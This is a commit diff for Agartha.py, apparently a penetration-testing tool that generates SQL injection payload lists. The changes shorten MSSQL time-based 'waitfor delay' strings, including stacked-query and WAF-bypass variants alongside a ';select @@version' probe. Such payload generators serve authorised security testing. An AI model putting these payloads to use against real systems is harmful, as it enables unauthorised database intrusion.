Projects STRLCPY agartha Commits f9755468
🤬
  • ■ ■ ■ ■ ■ ■
    Agartha.py
    skipped 475 lines
    476 476   listSQLi.append(prefix + unionPhrase + "\n")
    477 477   if self._cbTimeBased.isSelected():
    478 478   if escapeChar:
    479  - listSQLi.append(prefix + escapeChar + unionPhrase + " waitfor delay " + escapeChar + "00:00:02" + escapeChar + suffix + "\n")
     479 + listSQLi.append(prefix + escapeChar + unionPhrase + " waitfor delay " + escapeChar + "00:02" + escapeChar + suffix + "\n")
    480 480   else:
    481  - listSQLi.append(prefix + unionPhrase + " waitfor delay '00:00:02'" + "\n")
     481 + listSQLi.append(prefix + unionPhrase + " waitfor delay '00:02'" + "\n")
    482 482   if self._cbSqlWafBypass.isSelected():
    483  - listSQLi.append(prefix + unionPhrase + " waitfor delay \\'00:00:02\\'" + "\n")
     483 + listSQLi.append(prefix + unionPhrase + " waitfor delay \\'00:02\\'" + "\n")
    484 484   if self._cbOracleBased.isSelected():
    485 485   listSQLi.append(prefix + escapeChar + unionPhrase + " from dual" + suffix + "\n")
    486 486   if not escapeChar:
    skipped 116 lines
    603 603   listSQLi.append(prefix + escapeChar + ";select @@version" + "\n")
    604 604   if self._cbTimeBased.isSelected():
    605 605   if escapeChar:
    606  - listSQLi.append(prefix + escapeChar + " waitfor delay " + escapeChar + "00:00:02" + escapeChar + suffix + "\n")
    607  - listSQLi.append(prefix + escapeChar + ";waitfor delay " + escapeChar + "00:00:02" + escapeChar + suffix + "\n")
     606 + listSQLi.append(prefix + escapeChar + " waitfor delay " + escapeChar + "00:02" + escapeChar + suffix + "\n")
     607 + listSQLi.append(prefix + escapeChar + ";waitfor delay " + escapeChar + "00:02" + escapeChar + suffix + "\n")
    608 608   else:
    609  - listSQLi.append(prefix + " waitfor delay '00:00:02'" + suffix + "\n")
    610  - listSQLi.append(prefix + " waitfor delay '00:00:02'" + "\n")
    611  - listSQLi.append(prefix + ";waitfor delay '00:00:02'" + suffix + "\n")
    612  - listSQLi.append(prefix + ";waitfor delay '00:00:02'" + "\n")
     609 + listSQLi.append(prefix + " waitfor delay '00:02'" + suffix + "\n")
     610 + listSQLi.append(prefix + " waitfor delay '00:02'" + "\n")
     611 + listSQLi.append(prefix + ";waitfor delay '00:02'" + suffix + "\n")
     612 + listSQLi.append(prefix + ";waitfor delay '00:02'" + "\n")
    613 613   if self._cbSqlWafBypass.isSelected():
    614  - listSQLi.append(prefix + " waitfor delay \\'00:00:02\\'" + suffix + "\n")
    615  - listSQLi.append(prefix + " waitfor delay \\'00:00:02\\'" + "\n")
    616  - listSQLi.append(prefix + ";waitfor delay \\'00:00:02\\'" + suffix + "\n")
    617  - listSQLi.append(prefix + ";waitfor delay \\'00:00:02\\'" + "\n")
     614 + listSQLi.append(prefix + " waitfor delay \\'00:02\\'" + suffix + "\n")
     615 + listSQLi.append(prefix + " waitfor delay \\'00:02\\'" + "\n")
     616 + listSQLi.append(prefix + ";waitfor delay \\'00:02\\'" + suffix + "\n")
     617 + listSQLi.append(prefix + ";waitfor delay \\'00:02\\'" + "\n")
    618 618   listSQLi = list(set(listSQLi))
    619 619   listSQLi.sort()
    620 620   if self._cbSqlEncoding.isSelected():
    skipped 565 lines
Please wait...
Page is in error, reload to recover